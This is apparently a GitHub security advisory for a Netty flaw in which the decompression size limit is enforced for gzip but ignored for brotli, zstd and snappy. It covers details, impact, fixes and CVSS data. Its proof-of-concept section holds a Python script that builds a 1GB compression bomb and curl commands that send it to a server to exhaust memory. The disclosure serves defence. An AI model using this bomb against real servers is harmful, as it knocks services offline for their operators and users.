
Netty: HttpContentDecompressor maxAllocation bypass when Content-Encoding set to br/zstd/snappy leads to decompression bomb DoS

High severity • GitHub Reviewed • Published May 5, 2026 in netty/netty • Updated May 7, 2026

Package

io.netty:netty-codec-http (Maven)

Affected versions

>= 4.2.0.Alpha1, <= 4.2.12.Final
<= 4.1.132.Final

Patched versions

4.2.13.Final
4.1.133.Final
Package

io.netty:netty-codec-http2 (Maven)

Affected versions

>= 4.2.0.Alpha1, <= 4.2.12.Final
<= 4.1.132.Final

Patched versions

4.2.13.Final
4.1.133.Final

Description

Summary

HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service.

The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections.

Details

HttpContentDecompressor stores the maxAllocation value at construction time (HttpContentDecompressor.java:89) and uses it in newContentDecoder() to create the appropriate decompression handler.

For gzip/deflate, maxAllocation is forwarded to ZlibCodecFactory.newZlibDecoder():

// HttpContentDecompressor.java:101 — maxAllocation IS enforced
.handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation))

ZlibDecoder.prepareDecompressBuffer() enforces this as a hard cap by setting the buffer's maxCapacity and throwing DecompressionException when the limit is reached:

// ZlibDecoder.java:68 — hard limit on buffer capacity
return ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation);
// ZlibDecoder.java:80 — throws when exceeded
throw new DecompressionException("Decompression buffer has reached maximum size: " + buffer.maxCapacity());

For brotli, zstd, and snappy, the decoders are created without any size limit:

// HttpContentDecompressor.java:120 — maxAllocation IGNORED
.handlers(new BrotliDecoder())

// HttpContentDecompressor.java:129 — maxAllocation IGNORED
.handlers(new SnappyFrameDecoder())

// HttpContentDecompressor.java:138 — maxAllocation IGNORED
.handlers(new ZstdDecoder())

BrotliDecoder has no maxAllocation parameter at all — there is no way to constrain its output. It streams decompressed data in chunks via fireChannelRead with no total limit.
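
To make the missing limit concrete, here is a minimal, hedged sketch (not taken from the advisory; the class name and the bomb.br path are illustrative) that feeds a brotli-compressed file into a standalone BrotliDecoder through an EmbeddedChannel. It assumes netty-codec and the brotli4j native library are on the classpath; the decoder exposes no constructor argument or setter that could cap total output.

import io.netty.buffer.ByteBuf;
import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.compression.BrotliDecoder;
import java.nio.file.Files;
import java.nio.file.Paths;

public final class BrotliNoLimitDemo {
    public static void main(String[] args) throws Exception {
        byte[] compressed = Files.readAllBytes(Paths.get("bomb.br")); // payload generated as in the PoC below
        // No size limit can be configured on BrotliDecoder.
        EmbeddedChannel ch = new EmbeddedChannel(new BrotliDecoder());
        // writeInbound() decodes eagerly and queues every decompressed chunk; with a large
        // enough payload this call alone exhausts the heap, because nothing bounds the total.
        ch.writeInbound(Unpooled.wrappedBuffer(compressed));
        long total = 0;
        ByteBuf out;
        while ((out = ch.readInbound()) != null) {
            total += out.readableBytes();
            out.release();
        }
        ch.finishAndReleaseAll();
        System.out.println("decompressed " + total + " bytes, no limit was applied");
    }
}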

ZstdDecoder() defaults to a 4MB maximumAllocationSize, but this only constrains individual buffer allocations, not total output. The decode loop (ZstdDecoder.java:100-114) creates new buffers and fires channelRead repeatedly, so total decompressed output is unbounded: a 1GB payload is simply delivered as roughly 256 successive 4MB buffers.

The identical pattern exists in DelegatingDecompressorFrameListener.newContentDecompressor() at lines 188-210 for HTTP/2.
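
For orientation, here is a hedged sketch of where that listener is typically installed on an HTTP/2 server (the builder wiring and the Http2FrameAdapter stand-in are illustrative, not taken from the advisory); decompressed DATA frames then flow through the same unlimited decoders:

// Classes below are from io.netty.handler.codec.http2.
Http2Connection connection = new DefaultHttp2Connection(true); // true = server-side connection
Http2FrameListener application = new Http2FrameAdapter();      // stand-in for the real application listener
Http2ConnectionHandler handler = new Http2ConnectionHandlerBuilder()
        .connection(connection)
        .frameListener(new DelegatingDecompressorFrameListener(connection, application))
        .build();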

PoC

  1. Configure a Netty HTTP server with decompression bomb protection (a fuller pipeline sketch follows this list):
pipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max
pipeline.addLast(new HttpObjectAggregator(1048576));    // 1MB max
  2. Generate a brotli-compressed bomb (~1KB compressed → 1GB decompressed), plus a gzip-compressed copy for the comparison in step 3:
import brotli
import gzip
bomb = b'\x00' * (1024 * 1024 * 1024)  # 1GB of zeros
with open('bomb.br', 'wb') as f:
    f.write(brotli.compress(bomb, quality=11))  # compressed size: ~1KB
with open('bomb.gz', 'wb') as f:
    f.write(gzip.compress(bomb, compresslevel=9))  # bomb.gz is used in step 3
  3. Send the gzip-compressed bomb (BLOCKED by maxAllocation):
# This is caught — ZlibDecoder enforces the 1MB limit
curl -X POST http://target:8080/api \
  -H 'Content-Encoding: gzip' \
  --data-binary @bomb.gz
# Result: DecompressionException thrown at 1MB
  4. Send the same bomb with brotli encoding (BYPASSES maxAllocation):
# This bypasses the limit — BrotliDecoder has no maxAllocation
curl -X POST http://target:8080/api \
  -H 'Content-Encoding: br' \
  --data-binary @bomb.br
# Result: Full 1GB decompressed into memory → OOM
  5. The same bypass works with Content-Encoding: zstd and Content-Encoding: snappy.
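
For completeness, a fuller sketch of the step 1 server configuration (the bootstrap scaffolding and the commented-out application handler are illustrative additions, not part of the advisory):

import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioServerSocketChannel;
import io.netty.handler.codec.http.HttpContentDecompressor;
import io.netty.handler.codec.http.HttpObjectAggregator;
import io.netty.handler.codec.http.HttpServerCodec;

public final class VulnerableServer {
    public static void main(String[] args) throws Exception {
        EventLoopGroup boss = new NioEventLoopGroup(1);
        EventLoopGroup workers = new NioEventLoopGroup();
        try {
            ServerBootstrap b = new ServerBootstrap();
            b.group(boss, workers)
             .channel(NioServerSocketChannel.class)
             .childHandler(new ChannelInitializer<SocketChannel>() {
                 @Override
                 protected void initChannel(SocketChannel ch) {
                     ChannelPipeline pipeline = ch.pipeline();
                     pipeline.addLast(new HttpServerCodec());
                     pipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB "limit" (only enforced for gzip/deflate)
                     pipeline.addLast(new HttpObjectAggregator(1048576));    // 1MB aggregated-body cap
                     // pipeline.addLast(new ApiHandler());                  // hypothetical application handler
                 }
             });
            b.bind(8080).sync().channel().closeFuture().sync();
        } finally {
            boss.shutdownGracefully();
            workers.shutdownGracefully();
        }
    }
}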

Impact

  • Denial of Service: An attacker can cause out-of-memory conditions on any Netty server that relies on maxAllocation for decompression bomb protection, by simply using a non-gzip content encoding.
  • False sense of security: Developers who explicitly configure maxAllocation to protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered.
  • Trivial bypass: The attacker only needs to change one HTTP header (Content-Encoding: br instead of Content-Encoding: gzip) to circumvent the protection entirely.
  • Both HTTP/1.1 and HTTP/2: The vulnerability exists in both HttpContentDecompressor (HTTP/1.1) and DelegatingDecompressorFrameListener (HTTP/2).

Recommended Fix

Pass maxAllocation to all decoder constructors. For BrotliDecoder, which currently has no maxAllocation support, add the parameter:

HttpContentDecompressor.java — pass maxAllocation to all decoders:

// Line 120: BrotliDecoder — add maxAllocation support
.handlers(new BrotliDecoder(maxAllocation))

// Line 129: SnappyFrameDecoder — add maxAllocation support
.handlers(new SnappyFrameDecoder(maxAllocation))

// Line 138: ZstdDecoder — forward the configured maxAllocation
.handlers(new ZstdDecoder(maxAllocation))

DelegatingDecompressorFrameListener.java — same fix at lines 188-210.

BrotliDecoder — add maxAllocation parameter with the same semantics as ZlibDecoder.prepareDecompressBuffer(): set buffer maxCapacity and throw DecompressionException when the total decompressed output exceeds the limit.

SnappyFrameDecoder — add maxAllocation parameter with equivalent enforcement.

ZstdDecoder — ensure that when maxAllocation is set, total output across all buffers is bounded (not just per-buffer allocation size).
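
To illustrate the enforcement semantics described above (count total decompressed output and throw DecompressionException once the limit is crossed), the following is a hedged, standalone sketch written as an extra pipeline handler; the class name and limit are illustrative. It is not the upstream patch: because it runs after the decoder it cannot cap allocations made inside the decoder itself, which is why the limit ultimately belongs in the decoders.

import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.ChannelInboundHandlerAdapter;
import io.netty.handler.codec.compression.DecompressionException;
import io.netty.handler.codec.http.HttpContent;
import io.netty.handler.codec.http.LastHttpContent;
import io.netty.util.ReferenceCountUtil;

// Counts decompressed HttpContent bytes emitted by HttpContentDecompressor and fails the
// connection once they exceed the configured limit, regardless of the content encoding.
public final class DecompressedSizeLimiter extends ChannelInboundHandlerAdapter {
    private final long maxDecompressedBytes;
    private long seen;

    public DecompressedSizeLimiter(long maxDecompressedBytes) {
        this.maxDecompressedBytes = maxDecompressedBytes;
    }

    @Override
    public void channelRead(ChannelHandlerContext ctx, Object msg) {
        if (msg instanceof HttpContent) {
            seen += ((HttpContent) msg).content().readableBytes();
            if (seen > maxDecompressedBytes) {
                ReferenceCountUtil.release(msg);
                ctx.close();
                throw new DecompressionException(
                        "Decompressed content exceeded " + maxDecompressedBytes + " bytes");
            }
            if (msg instanceof LastHttpContent) {
                seen = 0; // reset for the next request on a keep-alive connection
            }
        }
        ctx.fireChannelRead(msg);
    }
}

// Usage: pipeline.addLast(new HttpContentDecompressor(1048576));
//        pipeline.addLast(new DecompressedSizeLimiter(1048576));
//        pipeline.addLast(new HttpObjectAggregator(1048576));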

References

@chrisvest published to netty/netty May 5, 2026
Published to the GitHub Advisory Database May 7, 2026
Reviewed May 7, 2026
Last updated May 7, 2026

Severity

High

CVSS overall score

7.5 / 10

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: None
Availability: High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Weaknesses

Uncontrolled Resource Consumption

The product does not properly control the allocation and maintenance of a limited resource.

CVE ID

CVE-2026-42587

GHSA ID

GHSA-f6hv-jmp6-3vwv
